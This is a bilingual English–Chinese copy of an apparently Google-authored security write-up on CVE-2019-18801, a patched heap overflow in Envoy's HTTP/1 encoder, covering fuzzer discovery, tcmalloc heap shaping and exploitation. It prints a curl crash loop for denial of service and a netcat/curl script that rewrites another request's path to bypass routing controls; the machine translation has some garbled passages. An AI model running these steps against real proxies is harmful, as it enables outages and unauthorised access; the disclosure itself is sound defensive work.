envoy_利用Envoy堆漏洞

envoy

At Google, we have a commitment to enhancing the security and reliability of the Envoy proxy. We have dedicated initiatives around hardening, fuzzing, and responding to CVEs that are intended to increase our confidence in the trustworthiness of Envoy as a component in our infrastructure stack and those of our customers. In addition, we offer a Vulnerability Reward Program, open to all security researchers who can provide details on security vulnerabilities in Envoy.

在Google，我们致力于增强Envoy代理的安全性和可靠性。我们围绕强化，模糊化和响应CVE采取了专门的举措，旨在增强我们对Envoy作为基础架构堆栈中的组件以及客户的可信度的信心。此外，我们提供了一个漏洞奖励计划，向所有可以提供Envoy安全漏洞详细信息的安全研究人员开放。

Why do we care about making Envoy secure? In addition to being good stewards of OSS projects, we also use Envoy to provide cloud services, like Internal HTTP(S) Load Balancing. For such services, customers depend on Google to uncover and resolve security issues.

我们为什么要关心使Envoy安全？除了成为OSS项目的好管家外，我们还使用Envoy提供云服务，例如Internal HTTP(S)Load Balancing 。对于此类服务，客户依靠Google来发现和解决安全问题。

This article provides a deep dive into an Envoy vulnerability that was successfully detected and fixed by our Envoy Platform team. The focus is on a single heap vulnerability in Envoy’s HTTP/1 codec which, if exploited, would allow an attacker to bypass Envoy’s access control and routing logic.

本文深入探讨了由Envoy平台团队成功检测并修复的Envoy漏洞。重点是Envoy的HTTP / 1编解码器中的单个堆漏洞，如果利用该漏洞，攻击者将绕过Envoy的访问控制和路由逻辑。

Heap vulnerabilities are rare in Envoy as we use modern C++ features such as smart pointers, fuzz the data plane and have high test coverage (97%+ line coverage). We also make use of Clang’s Address Sanitizer, which runs in our CI and during fuzzing. However, even a single heap vulnerability can provide a potent attack vector. We consider one of the contributions of this article to be raising the awareness over how heap vulnerabilities can be exploited on an L7 network proxy’s data plane, from first principles and with relatively little sophistication. This complements another recently published heap vulnerability in HAProxy’s HPACK implementation, CVE-2020–11100 from Google’s Project Zero.

在Envoy中，堆漏洞很少见，因为我们使用了现代C ++功能，例如智能指针，模糊数据平面并具有较高的测试覆盖率(97％+的行覆盖率)。我们还利用了Clang的Address Sanitizer ，它在CI中以及模糊测试期间运行。但是，即使是单个堆漏洞也可以提供强大的攻击媒介。我们认为，本文的贡献之一是提高了人们对从L1网络代理的数据平面如何利用堆漏洞的认识，这是从最初的原理开始的，而且相对复杂。这补充了HAProxy的HPACK实施中另一个最近发布的堆漏洞，即 Google的Project 0中的CVE-2020-11100 。

The vulnerability we focus on below is CVE-2019–18801, which was fixed in the 1.12.2 Envoy security release in early December 2019. GCP’s Internal HTTP(S) Load Balancing product (which is based on Envoy), was patched prior to the embargo release date. Envoy-derived binaries, e.g. Istio, were patched in tandem with the release. We were alerted to a potential exploit while investigating a report from one of Envoy’s data plane fuzzers running on ClusterFuzz. It required about 2 days of work to turn into a viable proof-of-concept, which including time learning about tcmalloc internals, experimenting with heap exploits techniques (e.g. heap shaping, vptr manipulation, etc.), building out tooling and working through the story below.

我们下面重点关注的漏洞是CVE-2019–18801 ，该漏洞已在2019年12月上旬的1.12.2 Envoy安全版本中修复。GCP的内部HTTP(S)负载平衡产品(基于Envoy)已在之前进行了修补。禁运发布日期。特使衍生的二进制文件(例如Istio)与发布一起进行了修补。在调查来自Envoy在ClusterFuzz上运行的数据平面模糊器之一的报告时，我们被警惕了潜在的漏洞利用。它需要大约2天的工作才能转化为可行的概念证明，其中包括花时间学习tcmalloc内部结构，试验堆利用技术(例如堆成形，vptr操作等)，构建工具并通过下面的故事。

It’s worth noting that the underlying implementation heap overrun bug would have been fixed even if no demonstrated exploit could have been found. Without the demonstration of exploitability, it would have been a correctness bug with potential security implications, and still worth fixing.

值得注意的是，即使找不到可能的利用程序，潜在的实现堆溢出错误也会得到修复。如果没有证明可利用性，那将是具有潜在安全隐患的正确性漏洞，仍然值得修复。

When talking about vulnerabilities, it’s helpful to be aware of the threat model. We take Envoy’s documented threat model and consider the case of an untrusted downstream client under the control of an attacker sending HTTP requests to an Envoy proxy in this article.

在谈论漏洞时，了解威胁模型会很有帮助。在本文中，我们采用Envoy记录的威胁模型，并考虑在攻击者控制下向Envoy代理发送HTTP请求的情况下不受信任的下游客户端的情况。

模糊的开始 (A fuzzy beginning)

Work on this exploit began when we were notified that ClusterFuzz had filed a new issue, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18431. The fuzzer in question was codec_impl_fuzz_test, exercising Envoy’s HTTP/1 and HTTP/2 codecs.

当我们被告知ClusterFuzz提出了一个新问题https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18431时，就开始了关于此漏洞利用的工作。有问题的模糊器是codec_impl_fuzz_test ，行使Envoy的HTTP / 1和HTTP / 2编解码器。

Due to Envoy’s use of ASSERTs to state invariants related to buffer allocations, the potential for an overflow was given in the top-level fuzz report:

由于Envoy使用ASSERT来声明与缓冲区分配有关的不变量，因此在顶级模糊报告中给出了发生溢出的可能性：

Crash Type: ASSERT
Crash Address:
Crash State:
bufferRemainingSize() >= length.
Envoy::Http::Http1::ConnectionImpl::copyToBuffer
Envoy::Http::Http1::RequestStreamEncoderImpl::encodeHeaders

By also examining the corpus provided by the fuzzer, it was evident that there was likely some interaction between the :method field and the Envoy::Http::Http1::ConnectionImpl::copyToBuffer() method in the HTTP/1 encoder.

通过检查模糊器提供的语料，很明显，：method字段和HTTP / 1编码器中的Envoy::Http::Http1::ConnectionImpl::copyToBuffer()方法之间可能存在一些交互。

headers {
  key: “:method”
  value: “GETactions {\n muta{\n ketruest_he key: ctions {\n ers {\n headers {\n key: ctions {\n new_streamTnrtasfTkey: ctioew: new_stream {asfer-e key: ctioew: r-e… and lots more like this… ”
}

Code inspection revealed that a memcpy was occurring within a buffer that didn’t depend on the :method header field value length in the HTTP/1.1 encode path. The code likely assumed that the only valid method values would be used, such as GET, POST, HEAD, etc. However, RFC 7231 allows for arbitrary header methods, as described in https://tools.ietf.org/html/rfc7231#section-4.

代码检查发现，在不依赖于 HTTP / 1.1编码路径中的 :method 标头字段值长度的缓冲区内发生了memcpy 。该代码可能假定将使用唯一有效的方法值，例如GET，POST，HEAD等。但是，RFC 7231允许使用任意标头方法，如https://tools.ietf.org/html/rfc7231中所述＃section-4 。

从漏洞到利用 (From vulnerability to exploit)

The fuzzer crash demonstrated that there was at least some implementation bug. The next step in understanding the vulnerability was to determine whether it was possible to send arbitrary method values on the wire as a remote attacker and have Envoy attempt to encode them as HTTP/1.

模糊测试崩溃表明至少存在一些实现错误。理解此漏洞的下一步是确定是否可以作为远程攻击者在网络上发送任意方法值，并让Envoy尝试将其编码为HTTP / 1。

Initial conversations with Envoy founder (and data plane expert) Matt Klein revealed that it was unlikely that the HTTP/1 parser would allow arbitrary methods at the decode stage. A simple experimental environment, in which an Envoy binary was pointed at an example bootstrap YAML for proxying to google.com demonstrated this was a correct assessment. Writing a request such as:

与Envoy创始人(和数据平面专家)Matt Klein的初步对话显示，HTTP / 1解析器不太可能在解码阶段允许任意方法。在一个简单的实验环境中，其中一个Envoy二进制文件指向了一个示例YAML引导程序，用于代理google.com，这证明这是正确的评估。编写请求，例如：

FooBar / HTTP/1.1
Host: foo

via netcat to the Envoy process and inspecting Envoy logs at trace level revealed that these non-standard methods are rejected immediately by http-parser:

通过netcat进入Envoy进程，并在跟踪级别检查Envoy日志，发现这些非标准方法立即被http-parser拒绝：

[2019–10–31 00:36:49.162][84055][debug][http] [source/common/http/conn_manager_impl.cc:275] [C2] dispatch error: http/1.1 protocol error: HPE_INVALID_METHOD

However, Envoy can proxy requests from an HTTP/2 client to a HTTP/1 backend. It was less clear whether our HTTP/2 parser, built on nghttp2, would block arbitrary methods. In general, HTTP/2 encourages a more opaque treatment of header values and regularizes treatment of the request method via the :method pseudo-header. It was plausible that the HTTP/2 parser wouldn’t attempt to interpret the contents of this header.

但是，Envoy可以将请求从HTTP / 2客户端代理到HTTP / 1后端。尚不清楚我们基于nghttp2构建的HTTP / 2解析器是否会阻止任意方法。通常，HTTP / 2鼓励对头值进行更不透明的处理，并通过:method伪头来规范化对请求方法的处理。 HTTP / 2解析器不会尝试解释此标头的内容是合理的。

To test this possibility, netcat was not very practical as a starting point, as we would need the ability to craft custom binary frames to send as an HTTP/2 request. curl provides the ability to add arbitrary request methods, so a probe request could be sent with:

为了测试这种可能性， netcat并不是一个非常实用的起点，因为我们需要能够定制自定义二进制帧以作为HTTP / 2请求发送的能力。 curl提供了添加任意请求方法的功能，因此可以通过以下方式发送探测请求：

curl --http2-prior-knowledge --request FooBar localhost:10000

This was successfully proxied through Envoy to the backend, so it seemed possible to exercise the code in question. The next probe was:

这已通过Envoy成功地代理到了后端，因此似乎有可能执行有问题的代码。下一个探测是：

curl --http2-prior-knowledge --request “AAAAAA… around 4200 As … AA” localhost:10000

When this request was applied to a debug Envoy build with ASSERTs enabled, the same crash that was reported by the fuzzer was observed. This was encouraging; now it was clear that a remote attacker with just curl could target any Envoy configured for downstream HTTP/2 and upstream HTTP/1, a fairly standard data plane forwarding behavior. It was clear at this point that the vulnerability might have wide scope and impact.

当此请求应用于启用ASSERT的Envoy调试构建时，观察到了模糊器报告的相同崩溃。这令人鼓舞；现在很明显，只有curl的远程攻击者可以针对配置为下游HTTP / 2和上游HTTP / 1的任何Envoy攻击，这是一种相当标准的数据平面转发行为。在这一点上很明显，该漏洞可能具有广泛的范围和影响。

死亡查询 (Query-of-death)

An obvious attack from this kind of heap corruption is a query-of-death (QoD). This is the simplest heap exploit to consider, but if it was easily repeatable, it would mean that a remote attacker could bring down an entire edge fleet of Envoys with only 1 query per Envoy. This would lead to a highly asymmetric DoS attack.

这种堆损坏的明显攻击是死亡查询(QoD)。这是要考虑的最简单的堆利用方法，但是，如果它很容易重复，则意味着远程攻击者可以关闭整个Envoy边缘队列，每个Envoy只需查询一次即可。这将导致高度不对称的DoS攻击。

After some experimentation, a QoD sequence that typically creates a crash within a few seconds was derived using just curl and some bash:

经过一些试验，仅使用curl和一些bash得出通常在几秒钟内造成崩溃的QoD序列：

while true
do
  curl -m “$((( RANDOM % 5) + 1 ))” \
    --http2-prior-knowledge --request “AAAA… around 48kb As” \
    localhost:10000 -d “foo” &
  sleep 1
done

What’s going on here? Multiple curl requests are being sent. Each is overflowing a buffer. In this example we used a simple Python backend test server to sink the traffic:

这里发生了什么？正在发送多个curl请求。每个缓冲区都溢出。在此示例中，我们使用了一个简单的Python后端测试服务器来减少流量：

python -m SimpleHTTPServer 1050

We use randomized delays for timeout to generate heap churn. This avoided falling into degenerate deterministic heap allocations, where we kept corrupting the same buffer that was never reused. The above example reproduces within a few requests and would have likely worked against a production service.

我们使用随机延迟进行超时以生成堆用户流失。这样可以避免陷入退化的确定性堆分配中，在该分配中，我们不断破坏从未使用过的同一缓冲区。上面的示例在几个请求内进行了重现，并且可能会对生产服务不利。

数据平面操纵 (Data plane manipulation)

Crashing an Envoy fleet via a QoD spray is a good start, but we can potentially do more with a heap overflow vulnerability such as this, by taking advantage of HTTP proxy specifics. Potential exploits include:

通过QoD攻击使Envoy机队崩溃是一个好的开始，但是我们可以利用HTTP代理的特定特性，利用诸如此类的堆溢出漏洞做更多的事情。潜在的漏洞利用包括：

Corrupting other in-flight requests, for example rewriting contents or headers of some other user’s request.
破坏其他进行中的请求，例如重写其他用户请求的内容或标头。
Corrupting source/length of memory copies or buffers to read out arbitrary memory contents, leaking high value data such as crypto keys. By having contents copied into requests an attacker controls, a means of exfiltration on the wire may exist.
损坏的内存副本或缓冲区的源/长度以读取任意内存内容，从而泄漏高价值数据(例如，加密密钥)。通过将内容复制到攻击者控制的请求中，可以存在一种在网络上进行渗透的方法。
Remote code exploit (RCE), where complete remote ownership of the process takes place.
远程代码利用(RCE)，在该过程中将对进程进行完全的远程所有权。

The most devastating remote attack is a reliable RCE or a memory read out. RCEs are somewhat trickier on the heap in comparison to the stack. This is because the heap is typically used for data accesses rather than control flow. However, in C++ we have the potential to corrupt vtable pointers, as well as regular function pointers.

最具破坏性的远程攻击是可靠的RCE或内存读取。与堆栈相比，RCE在堆栈上有些棘手。这是因为堆通常用于数据访问而不是控制流。但是，在C ++中，我们有可能破坏vtable指针以及常规函数指针。

RCEs are typically mitigated by ASLR. We started to explore by examining the text segment in /proc//smaps, to establish whether ASLR was enabled for Envoy:

RCE通常由ASLR缓解。我们通过检查/proc//smaps的文本段来进行探索，以确定是否为Envoy启用了ASLR：

00400000-017ee000 r-xp 00000000 fe:01 17961168                           /usr/local/.../bazel-out/k8-opt/bin/source/exe/envoy-static

This didn’t look very random; in fact it’s the link address. OSS Envoy was missing the -fPIE compile option and the Linux kernel can only do ASLR for a position independent executable. This was an oversight and was fixed in https://github.com/envoyproxy/envoy/pull/8792.

这看起来不是很随机。实际上，这是链接地址。 OSS Envoy缺少-fPIE编译选项，并且Linux内核只能对位置无关的可执行文件执行ASLR。这是一个疏忽，已在https://github.com/envoyproxy/envoy/pull/8792中修复。

A key property of any exploit is it needs to be repeatable, not just a one in a billion possibility. To create a reliable exploit, we don’t want to rely on arbitrary memory contents being overwritten, as we don’t know what the heap looks like in general. Instead, we want the heap to be primed so that when a buffer overflow is triggered, there will be something located at the overflow location that is highly likely to result in an exploit possibility. The idea of priming the heap in this way is generally known as heap shaping (aka heap grooming, heap feng shui, see related heap spraying).

任何利用的关键特征是它必须具有可重复性，而不仅仅是十亿分之一的可能性。为了创建可靠的漏洞利用，我们不希望依赖于被覆盖的任意内存内容，因为我们通常不知道堆的外观。相反，我们希望对堆进行初始化，以便在触发缓冲区溢出时，将在溢出位置放置一些很有可能导致被利用的可能性。以这种方式启动堆的想法通常称为堆整形 (又名堆修饰，堆风水，请参阅相关的堆喷涂 )。

To understand how it’s possible to shape the heap in the Envoy case, a useful starting place is the memory allocator. In Envoy, this is tcmalloc, selected for its performance and profiling capabilities. A key insight that enables simple heap shaping is tcmalloc’s small object allocation algorithm. A number of heap allocation classes exist, grouping allocations into similar size classes. If two allocations of X bytes and ≈X bytes occur, they are likely to land in the same size class. On the hot path, each thread maintains its own free list for each size class. When depleted, the thread asks a global (central) allocator for more objects in this class. When the central allocator is depleted, it requests large contiguous page allocations (referred to as slabs) that are then broken up into the objects of the size class. The free list operates LIFO, so on a quiescent system, there is an opportunity to use these facts to arrange the free list and data allocations to create an exploit opportunity.

要了解在Envoy情况下如何调整堆大小，一个有用的起点是内存分配器。在Envoy中，这是tcmalloc ，因为其性能和性能分析功能而选择。 tcmalloc的小对象分配算法是实现简单堆成形的关键见解。存在许多堆分配类，将分配分为相似的大小类。如果出现X字节和≈X字节的两个分配，则它们很可能落在相同的大小类中。在热路径上，每个线程为每个大小类维护自己的空闲列表。耗尽后，线程会向全局(中央)分配器询问此类中的更多对象。当中央分配器用尽时，它会请求连续的大页面分配(称为平板)，然后将其分解为大小类的对象。空闲列表运行LIFO，因此在静态系统上，有机会利用这些事实来安排空闲列表和数据分配，以创造利用机会。

The first trick is to ensure that all objects, both the encoding buffer for the overflow and the target for the overflow come from the same size class. This provides the possibility that they will be coresident on the same slab of pages allocated by the central allocator. The encoding buffer is sized at 4kb + path length and comes from a reservation from Envoy’s Buffer::OwnedImpl. Ultimately, these reservations are backed by Buffer::OwnedSlice and allocated via a custom new. These heap allocations are rounded up to the next page size, so will be 8kb. As a result, we needed the target buffer for the attack to also be 8kb.

第一个技巧是确保所有对象(用于溢出的编码缓冲区和用于溢出的目标)都来自相同的大小类。这提供了它们将共存于由中央分配器分配的同一页页面上的可能性。编码缓冲器在尺寸4KB +路径长度和来自一个预约从特使的Buffer::OwnedImpl 。最终，这些保留由Buffer::OwnedSlice支持，并通过自定义 new分配。这些堆分配将舍入到下一个页面大小，因此将为8kb。结果，我们需要用于攻击的目标缓冲区也为8kb。

How could we create a target buffer of 8kb? There are a few ways to do this:

我们如何创建8kb的目标缓冲区？有几种方法可以做到这一点：

Have multiple requests, each with allocations that are ≈8kb. We knew we could get this for free in the request encode buffer. By adjusting both start and completion times of requests, it would be possible to shape the ordering of the tcmalloc free lists.
有多个请求，每个请求的分配量约为8kb。我们知道我们可以在请求编码缓冲区中免费获得它。通过调整请求的开始时间和完成时间，可以调整tcmalloc空闲列表的顺序。
Sending large bodies in the request that are ≈8kb.
在请求中发送≈8kb的大型正文。
We also had prior knowledge that Envoy’s HeaderMapImpl would malloc buffers to fit request header values, so using large headers could also force such allocations.
我们还具有Envoy的HeaderMapImpl将对缓冲区进行分配以适合请求标头值的先验知识，因此使用较大的标头也可以强制进行此类分配。

The next part of the attack was to have the encode buffer precede the target buffer and be within a range that header byte size limits would allow (64kb). To understand memory layout, we sent multiple large requests (with techniques 1–3) populated with ASCII A (0x41) in the method header and ASCII B (0x42) in the data payload, set a breakpoint on the firing ASSERT and inspected memory contents under gdb. This was a form of dye tracing. In addition, we inserted log messages at various sites to track likely large allocations of interest. Visually, it’s easy to page through memory around the target with a command such as:

攻击的下一部分是使编码缓冲区位于目标缓冲区之前，并且位于报头字节大小限制所允许的范围内(64kb)。为了理解内存布局，我们发送了多个大请求(使用技术1-3)，方法请求的头分别填充了ASCII A(0x41)和数据有效负载中的ASCII B(0x42)，在触发ASSERT上设置了断点并检查了内存内容在gdb下。这是染料追踪的一种形式。此外，我们在各个站点插入了日志消息，以跟踪可能的大量兴趣分配。在视觉上，使用以下命令很容易在目标周围的内存中分页：

(gdb) x /5000xw 0x26f0000

And see output like:

并看到如下输出：

0x26f0000: 0x0138b490 0x00000000 0x026f0028 0x00000000
0x26f0010: 0x00000000 0x00000000 0x00000000 0x00000000
0x26f0020: 0x00001fd8 0x00000000 0x41414141 0x41414141
0x26f0030: 0x41414141 0x41414141 0x41414141 0x41414141
…
0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000
0x2701010: 0x00000000 0x00000000 0x00000000 0x00000000
0x2701020: 0x00001fd8 0x00000000 0x42424242 0x42424242
0x2701030: 0x42424242 0x42424242 0x42424242 0x42424242
…

After some fiddling around with ordering, multiplicity and timing, we got lucky. Envoy happened to allocate the header encoding buffer immediately before the slice related to the data payload. This luck was helpful but not necessary, we describe more explicit heap shaping below.

在摆弄顺序，多样性和时机之后，我们很幸运。 Envoy恰好在与数据有效负载相关的切片之前分配了头编码缓冲区。运气是有帮助的，但不是必需的，我们在下面描述更明确的堆整形。

Now that we had a target Buffer::OwnedSlice, tweaking the method header size slightly to force it to overrun the buffer was possible via some iteration. The key to causing a crash here was to consider what the initial bytes of the target buffer look like:

现在我们有了目标Buffer::OwnedSlice ，可以通过一些迭代来稍微调整方法标头的大小，以迫使其超出缓冲区。导致崩溃的关键在于考虑目标缓冲区的初始字节是什么样的：

0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000

There were some interesting targets here that are likely to cause segfaults if corrupted. The first was the C++ object vptr 0x0138b490. Writing 0x42424242 over this would crash control flow. The next is 0x02701028, which due to a detail of buffer implementation provides an indirect to the real buffer contents. This would also crash on access if corrupted and later accessed.

这里有一些有趣的目标，如果目标损坏，很可能会导致段错误。第一个是C ++对象vptr 0x0138b490 。对此写入0x42424242将导致控制流崩溃。下一个是0x02701028 ，由于缓冲区实现的详细信息，它提供了对实际缓冲区内容的间接访问。如果损坏并且以后访问，这也会在访问时崩溃。

So, we had another repeatable crash vector. The next step was to consider what would happen if we rewrote the vptr in a more deliberate way. This would allow us to change later code execution. What if we rewrote the buffer base to point it at some arbitrary memory location we wanted to read? We might be able to copy into our request ranges of Envoy process memory.

因此，我们有了另一个可重复的崩溃向量。下一步是考虑如果我们以更刻意的方式重写vptr会发生什么。这将使我们能够更改以后的代码执行。如果我们重写了缓冲区库以将其指向我们要读取的任意内存位置该怎么办？我们也许可以将Envoy进程内存范围复制到我们的请求中。

We tweaked the overflow to include changes to pointer locations, using \x escaping in the curl strings. Unfortunately, Envoy started to reject the HTTP/2 client requests prior to them being able to reach the HTTP/1 encoder. This was because the HTTP/2 standard limits header value characters to printable ASCII characters as per RFC constraints on valid header values (https://tools.ietf.org/html/rfc7230#section-3.2.6). Nghttp2 enforces this property.

我们使用\ x在转义字符串中转义来调整溢出以包括对指针位置的更改。不幸的是，Envoy在能够到达HTTP / 1编码器之前就开始拒绝HTTP / 2客户端请求。这是因为HTTP / 2标准根据对有效标头值( https://tools.ietf.org/html/rfc7230#section-3.2.6 )的RFC约束，将标头值字符限制为可打印的ASCII字符。 Nghttp2强制执行此属性。

This limitation significantly reduced the potential for the exploit as developed so far; it was not possible to rewrite pointers in a meaningful way. Back to the drawing board.

这种局限性大大降低了迄今为止开发的漏洞利用的可能性；不可能以有意义的方式重写指针。回到绘图板。

定位普通内存分配 (Targeting plain memory allocations)

Envoy performs both C++ object allocations on the heap via new and also regular plain mallocs. Plain mallocs don’t have the problem of vptr corruption. Large header values are allocated in dedicated malloc buffers in Envoy. What if it was possible to manipulate the contents of an in-flight header string to achieve some interesting outcome?

Envoy通过new和常规的普通malloc在堆上执行C ++对象分配。普通malloc不会出现vptr损坏的问题。大的标头值分配在Envoy的专用malloc缓冲区中。如果可以操纵飞行中标题字符串的内容以实现一些有趣的结果怎么办？

We knew from a previous CVE that being able to have the interpretation of the :path header by the backend be different to that used when Envoy performs its authorization checks (ext_authz, RBAC, route table lookup) is useful. It can provide bypass of Envoy’s authorization and access control capabilities, for example. So, we looked at what could be done to the path header. After some experimentation, the following seemed likely to work:

从先前的CVE中我们知道，后端对:path标头的解释与Envoy执行其授权检查(ext_authz，RBAC，路由表查找)时使用的解释有所不同。例如，它可以绕过Envoy的授权和访问控制功能。因此，我们研究了可以对路径头执行的操作。经过一些试验，以下似乎可行：

Remote attacker shapes the heap with some preliminary requests.
远程攻击者通过一些初步请求来调整堆。
Remote attacker sends request A with the path set to //..about 8kb of /…/. The advantages of this pattern is that it is often collapsed to / by backends.
远程攻击者发送的请求A的路径设置为//..about 8kb of /…/ .. //..about 8kb of /…/ 。这种模式的优点是它经常被后端折叠。
Envoy performs ext_authz, RBAC, routing on request A and then buffers request A. We assume the use of the buffer filter, which is not uncommon.
Envoy在请求A上执行ext_authz，RBAC，路由，然后对请求A进行缓冲。我们假定使用缓冲过滤器，这种情况并不罕见。
Remote attacker sends request B with the method header overflow. The encoding buffer for B must precede the path header malloc for A, as a result of the shaping in (1).
远程攻击者发送带有方法头溢出的请求B。由于(1)中的整形，B的编码缓冲区必须在A的路径头malloc之前。
Request B modifies the path in A to point to /some_secret_treasure. The remote attacker now bypasses Envoy’s access controls and gains access via request A to protected backend services (the secret treasure).
请求B修改A中的路径以指向/some_secret_treasure 。远程攻击者现在绕过Envoy的访问控制，并通过请求A获得对受保护的后端服务(秘密宝藏)的访问。

A more sophisticated attacker might at this point have turned their attention to the tcmalloc heap data structures, or maybe looked for other raw malloc buffers that could be manipulated for RCE or leaking out crypto keys; this requires some time and creativity, and we already had a likely attack vector, so we moved onto making this exploit reliably reproducible. The key was to manage step (1) above.

更复杂的攻击者此时可能已将注意力转移到tcmalloc堆数据结构上，或者正在寻找可以为RCE操纵或泄露密钥的其他原始malloc缓冲区。这需要一些时间和创造力，而且我们已经有了一个可能的攻击载体，因此我们着眼于可靠地再现此漏洞。关键是要管理上面的步骤(1)。

整堆 (Shaping the heap)

For any non-crash exploit, we also ideally want the target buffer to still be active after the overflow request encoding occurs. This requires that we pay attention to the timing of requests and be able to have some ability to influence this; at this point curl alone is not the right tool.

对于任何非崩溃利用，我们理想情况下还希望目标缓冲区在发生溢出请求编码后仍保持活动状态。这就要求我们注意请求的时间，并具有一定的影响力；在这一点上，单靠curl并不是正确的工具。

There are dedicated packet and request manipulation tools, for example scapy. However, we had some HTTP/2 header encoding utilities from previous CVEs and fuzzers in Envoy, so we opted to use these as the basis for the attacks. We wrote a short utility based on these libraries to generate a file preamble-and-headers.bin providing connection prefix consisting of:

有专用的数据包和请求操作工具，例如scapy 。但是，我们在Envoy中有一些来自以前的CVE和模糊器的HTTP / 2标头编码实用程序，因此我们选择将它们用作攻击的基础。我们基于这些库编写了一个简短的实用程序，以生成文件preamble-and-headers.bin提供连接前缀，其中包括：

HTTP/2 client connection preface
HTTP / 2客户端连接前言
Default SETTINGS frame
默认设置框
Initial WINDOW_UPDATE frame
初始WINDOW_UPDATE帧

together with a candidate HEADERS frame with the 8kb ///.. path. A second file, data-eos.bin, had a DATA frame with EOS set. Using this pattern, netcat could be used to send, hold and finish a request stream, e.g.:

以及带有8kb ///..路径的候选HEADERS帧。第二个文件data-eos.bin具有设置了EOS的DATA帧。使用此模式， netcat可用于发送，保留和完成请求流，例如：

(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
 nc -N localhost 10000

If we imagine the tcmalloc thread local cache slab for 8KB in question to look like H₀H₁H2 and free list to be [H₀, H₁, H₂] initially, we want to arrange something like:

如果我们假设问题8KB的tcmalloc线程本地缓存slab看起来像H₀H₁H2，而空闲列表最初是[H₀，H₁，H2]，则我们想安排以下内容：

H₀ = request encode buffer for overflow request B.
H₀=溢出请求B的请求编码缓冲区。
H₁ = malloc allocation for 8kb ///.. path in target request A.
///.. =目标请求A中8kb ///..路径的malloc分配。

To shape the heap, we can send an initial shaping request with an 8kb path header, call this request S, and hold it. At this point, the free list looks like [H₁, H₂].

要对堆进行整形，我们可以发送带有8kb路径头的初始整形请求，将该请求称为S并保留它。此时，自由列表看起来像[H 1，H 2]。

We then send request A and hold it. The free list looks like [H₂] and we have H₀ containing request S’s path header and H₁ containing request A’s path header.

然后，我们发送请求A并保留它。空闲列表看起来像[H 2]，我们有包含请求S的路径标头的H 1和包含请求A的路径标头的H 3。

We now send “end stream” for request S, resulting in a free list of [H₀, H₂].

现在我们为请求S发送“结束流”，得到[H 1，H 2]的自由列表。

We then send request B, which will have its request header allocated at H₀, immediately below request A’s path header. This is deterministic on a quiescent Envoy. It’s necessary to set — concurrency 1 to increase the odds of it working reliably. More sophisticated shaping could probably make this work with higher probability on loaded or multi-worker servers.

然后我们发送请求B，该请求的请求头将分配在H 1处，紧接在请求A的路径头之下。这是对静态特使的确定性。必须设置— concurrency 1来增加它可靠工作的几率。更复杂的整形可能会使此工作在已加载或多工作人员的服务器上具有更高的可能性。

At this point, we have the techniques to deterministically overwrite the path of one request with contents in the method header of another request. The next step was to generate a proof-of-concept. We configured Envoy with the following HCM bootstrap:

至此，我们掌握了使用另一请求的方法标头中的内容确定性地覆盖一个请求的路径的技术。下一步是生成概念证明。我们使用以下HCM引导程序配置了Envoy：

- name: envoy.http_connection_manager
  typed_config:
    “@type”: type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
    codec_type: HTTP2
    stat_prefix: ingress_http
    route_config:
      name: local_route
      virtual_hosts:
      - name: local_service
        domains: [“*”]
        routes:
        - match:
            prefix: “/treasure”
            headers:
            - name: “:method”
              exact_match: “GET”
          direct_response:
            status: 503
        - match:
            prefix: “/”
          route:
            cluster: service_google
    http_filters:
    - name: envoy.buffer
      config:
        max_request_bytes: 128000
    - name: envoy.router

The /treasure path was supposed to be sinkholed. The use of GET header matching here is due to a technicality that becomes apparent when we expand what the backend sees below.

/treasure路本来应该陷入困境。此处使用GET标头匹配的原因是，当我们扩展后端在下面看到的内容时，技术性变得显而易见。

The attack script was then:

攻击脚本是：

# Request S
(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
 nc -N localhost 10000 &
sleep 0.5
# Request A
(cat preamble-and-headers.bin; sleep 10; cat data-eos.bin) | \
 nc localhost 10000 > result_containing_the_secret_treasure &
sleep 3
# Request B
curl --http2-prior-knowledge \
  --request “AA.. about 8kb of A.. AA” \
  localhost:10000/treasure -d “foo”

This roughly follows the logic described above, but there is one trick, the request for treasure is in the path, not the method overflow… why?

这大致遵循上述逻辑，但是有一个窍门，对宝藏的请求在路径中，而不是方法溢出……为什么？

When we first attempted to overflow the buffer, and placed /treasure in the method header overflow, a strange request was delivered:

当我们第一次尝试溢出缓冲区，并将/treasure放置在方法标头溢出中时，传递了一个奇怪的请求：

GET /treasure / HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 79a313a6–996d-4266-bf8f-646205d24ac9
x-envoy-expected-rq-timeout-ms: 15000
.../ HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: be710b85–8c80–46be-92cb-895191299638
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

There are two path specifiers in the first line of the request (illegal) and what looks to be two nested requests. Envoy’s HTTP/1 request encoder appended the buffer in request B, overflowed into request A, but then also continued to finalize the headers for request B inside request A’s path header value. We needed a slightly different strategy to make the exploit work given this behavior:

请求的第一行(非法)有两个路径说明符，看起来是两个嵌套的请求。 Envoy的HTTP / 1请求编码器将缓冲区附加到请求B中，溢出到请求A中，然后还继续在请求A的路径标头值中最终确定请求B的标头。考虑到此行为，我们需要一种略有不同的策略来使利用工作：

curl --http2-prior-knowledge \
  --request “AA.. about 8kb of A.. AA” \
  localhost:10000/treasure -d “foo”

We tweaked the overflow bytes in request B to position request B’s encoder such that once it had written its method inside its own buffer, the remainder of request B, starting with the /treasure path, became the new path for request A. Due to new line breaking in request A’s path, we end up with request A’s header encoding treated as request A’s HTTP body. The backend then observed:

我们对请求B中的溢出字节进行了调整，以定位请求B的编码器，以便一旦将其方法写入其自己的缓冲区中，请求B的其余部分(从/treasure路径开始)就成为了请求A的新路径。在请求A的路径中换行，我们最终将请求A的标头编码视为请求A的HTTP正文。后端然后观察到：

GET /treasure HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 95028bfb-7890–4f6a-a96f-1b43a48716c6
x-envoy-expected-rq-timeout-ms: 15000
.../ HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: 04964d4c-19a7–41bb-8a90-d2dedbe9755b
